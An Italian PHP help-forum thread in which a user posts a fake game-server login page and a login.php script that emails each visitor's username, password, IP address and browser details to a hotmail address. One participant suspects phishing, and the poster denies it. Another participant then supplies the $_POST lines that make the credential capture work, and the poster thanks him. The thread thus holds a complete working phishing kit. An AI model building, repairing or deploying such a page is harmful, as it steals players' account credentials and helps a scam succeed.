Variabili non lette da form

[Nabb1]

Salve a tutti,
Sono Domenico e vengo da milano, mi sono iscritto pochi minuti fa...
Avrei bisogno di aiuto per quanto riguarda il "mio" sito web personale ereditato da un amico che se ne è stufato.
Si tratta del sito di un retroserver di un gioco online e il problema lo riscontro nella parte dedicata all'assistenza\premiazioni, in pratica il giocatore dovrebbe immettere il duo username e password che devono essere inviati alla mia casella di posta per poi entrare nel suo account e risolvere il problema o assegnare il premio.
Questo problema sarebbe che nella mail mancano username e password!
Ecco i due script:

Questo è "index.htm"

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">



<link rel="stylesheet" href="index_files/format2.css" type="text/css">
<link rel="stylesheet" href="index_files/menue.css" type="text/css">

<title>LocMt2 - Login</title></head><body background="hg.jpg">



<table id="aussen" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr>
<td align="center" width="100%">

<table id="main_top" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td id="top1" valign="middle"></td>
</tr>
<tr>
<td id="top2" valign="middle" bordercolor="#000000">
[img]LOCMT2FRONT.jpeg[/img]</td>
</tr>
<tr>
<td id="top3">

</td>
</tr>

<tr>
<td class="buleiste" style="background-image: url('button.jpg')">

<table id="menu1" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>

<td background="button.jpg">Home</td><td class="menutrenn">[img]index_files/trenn.jpg[/img]</td>
<td background="button.jpg">Registrati</td><td class="menutrenn">[img]index_files/trenn.jpg[/img]</td>
<td background="button.jpg">Login</td><td class="menutrenn">[img]index_files/trenn.jpg[/img]</td>
<td>Item Shop</td><td class="menutrenn">[img]index_files/trenn.jpg[/img]</td>
<td>Regolamento</td><td class="menutrenn">[img]index_files/trenn.jpg[/img]</td>
<td>Contatti</td><td class="menutrenn">[img]index_files/trenn.jpg[/img]</td>
<td>Forum</td><td class="menutrenn">[img]index_files/trenn.jpg[/img]</td>
<td>Download</td><td class="menutrenn">[img]index_files/trenn.jpg[/img]</td>
<td>Classifica</td>
</tr>
</tbody></table>

</td>
</tr>
</tbody></table><table id="main" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td align="center" valign="top">
<table id="main2" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td id="inbox" style="background-image: url('hg.jpg')">
<center>
<form action="login.php" method="POST">





Account ID

<input name="account" size="60" type="text">




Password

<input name="password" size="60" type="password">



<input name="submit" value="Login" type="submit">
</p>
</form>



<font size="2">Hai dimenticato la Password? <a href="http://locmt2.eu/lost_pass.php" target="_blank">
Clicca qui!</a></font></p>



</center></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td></tr>
</tbody></table>


.</p>

</body></html>







E questo è "login.php"

<?php
$yourmail = "lucxxxx@hotmail.it";
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$useragent=$_SERVER['HTTP_USER_AGENT'];
$td = date("F jS");
$date = date("d M Y");
$time = date("g:i a");
$LogTime = trim(" Date: ".$date.", Time: ".$time);
mail("$yourmail", "Account $account", "Username: $account \nPassword: $password \n\nIndirizzo IP: $ip \nData log: $LogTime \nSystem Info: $useragent","from: $account <$account>");
?>



Vi prego di aiutarmi perchè è dalle 8:00 di stamane che ci lavoro sopra...
Chiedo anche gentilmente di essere chiari nelle spiegazioni perchè non sono molto pratico...
Vi ringrazio anticipatamente
_Nabb1_

[simo22]

Il problema è facilmente risolvibile tramite la lettura del regolamento.

[satifal]

Originariamente inviato da Nabb1
... in pratica il giocatore dovrebbe immettere il duo username e password che devono essere inviati alla mia casella di posta per poi entrare nel suo account ...

Mi sembra alquanto strana a bizzarra come procedura. Mai sentito parlare di Phishing?

[daniele_dll]

Originariamente inviato da simo22
Il problema è facilmente risolvibile tramite la lettura del regolamento.

I titoli contenenti Help, Aiuto, Urgente e via dicendo sono VIETATISSIMI!

Per questa volta, visto che sei nuovo, ti aiuto io, però gentilmente, prima di aprire nuovi thread o di rispondere nei thread già esistenti, compreso questo, leggi con estrema attenzione il regolamento

PS: il problema è dovuto a register globals ^^

[Nabb1]

Non si tratta di pishing, davvero...

[Nabb1]

Scuatemi non volevo infrangere il regolamento.. comunque cosa sono questi globals? :/

[satifal]

Originariamente inviato da Nabb1
... cosa sono questi globals? :/

Usare Google no eh?! register globals è il primo risultato!

[Nabb1]

Ma non ne capisco proprio niente in quella pagina, in inglese poi! sono davvero disperato... vi prego di darmi la soluzione... magari lo script corretto..

[daniele_dll]

... mettici un po di impegno ...

qui aiutiamo per passione ... ma non facciamo il lavoro altrui perché, molti di quelli che frequentano il forum php, ci lavorano con php e quindi si fanno pagare ^^

Allora, il register globals comporta che quando è attivo se in un form hai un campo che ha come name prova allora nel codice, dallo scope principale, potrai accedere alla variabile $prova.

Senza register global questo non è possibile (per fortuna, perché ci sono un'infinita quantità di problemi di sicurezza relativi proprio al register globals attivo!)

Le variabili vanno lette tramite $_GET, $_POST e via dicendo, è questo il metodo corretto per farlo.

Nella penultima riga, quella dove invii la e-mail, il codice è

codice:

mail("$yourmail", "Account $account", "Username: $account \nPassword: $password \n\nIndirizzo IP: $ip \nData log: $LogTime \nSystem Info: $useragent","from: $account <$account>");

Tutte le variabili, ovvero quelle precedute dal $, DEVONO essere state dichiarate altrimenti potrebbe dare errore, o come in questo caso, semplicemente considerarle vuote (anche questo comporta implicazioni di sicurezza perché come vedi l'errore non si vede subito ma è proprio che è le variabili non sono dichiarate!)

Le variabili usate li sono
- $yourmail, che è dichiarata subito dopo l'apertura del tag di php
- $account, è una variabile del form e non è dichiarata
- $password, proveniente anch'essa dal form e non è dichiarata
- $ip, dichiarata qualche riga prima
- $logtime, dichiarata qualche riga prima
- $useragent, dichiarata qualche riga prima

Per risolvere il problema, prima della riga mail(...., .....); metti semplicemente

codice:

$account = $_POST['account'];
$password = $_POST['password'];

[Nabb1]

daniele_dll
IO TI ADORO!
Grazie mille, nonostante la mia nabbosità sei riuscitoa farmi capire tutto! davvero Grazie di cuore!